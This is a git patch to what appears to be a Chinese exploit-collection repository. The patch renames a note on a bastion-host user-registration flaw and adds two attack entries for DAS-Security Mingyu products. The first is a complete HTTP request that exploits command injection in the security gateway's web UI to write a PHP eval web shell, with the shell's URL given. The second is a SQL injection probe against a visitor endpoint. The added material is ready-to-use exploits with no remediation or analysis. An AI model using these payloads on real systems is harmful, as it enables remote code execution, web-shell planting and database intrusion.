From dc749bfe11e34c2df74d476ce677148057ae46c7 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 19 Aug 2023 20:48:50 +0800 Subject: [PATCH] =?UTF-8?q?Update=20and=20rename=20=E6=9F=90=E6=81=92?= =?UTF-8?q?=E6=98=8E=E5=BE=A1=E8=BF=90=E7=BB=B4=E5=AE=A1=E8=AE=A1=E4=B8=8E?= =?UTF-8?q?=E9=A3=8E=E9=99=A9=E6=8E=A7=E5=88=B6=E7=B3=BB=E7=BB=9F=E5=A0=A1?= =?UTF-8?q?=E5=9E=92=E6=9C=BA=E4=BB=BB=E6=84=8F=E7=94=A8=E6=88=B7=E6=B3=A8?= =?UTF-8?q?=E5=86=8C.md=20to=20=E6=9F=90=E6=81=92=E6=98=8E=E5=BE=A1?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...险控制系统堡垒机任意用户注册.md => 某恒明御漏洞.md | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) rename 某恒明御运维审计与风险控制系统堡垒机任意用户注册.md => 某恒明御漏洞.md (70%) diff --git a/某恒明御运维审计与风险控制系统堡垒机任意用户注册.md b/某恒明御漏洞.md similarity index 70% rename from 某恒明御运维审计与风险控制系统堡垒机任意用户注册.md rename to 某恒明御漏洞.md index 2c23c5b..04fc33f 100644 --- a/某恒明御运维审计与风险控制系统堡垒机任意用户注册.md +++ b/某恒明御漏洞.md @@ -103,3 +103,31 @@ Content-Length: 1121 ``` + +## 安恒明御安全网关rce +``` +GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1|echo+" +<%3fphpteval(\$_POST[\"a\"]) ;?>"+>+.xxx.php HTTP/1.1 +Host: xxx +Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081 +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 +Sec-Fetch-User: ?1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + + +shell:http://xxxx/webui/.xxx.php +``` +## 明御 SQL注入: +``` +/caztbweb/VisitorWeb/VisitorWeb_XMLHTTPaspx?ParentCode=1' +``` + +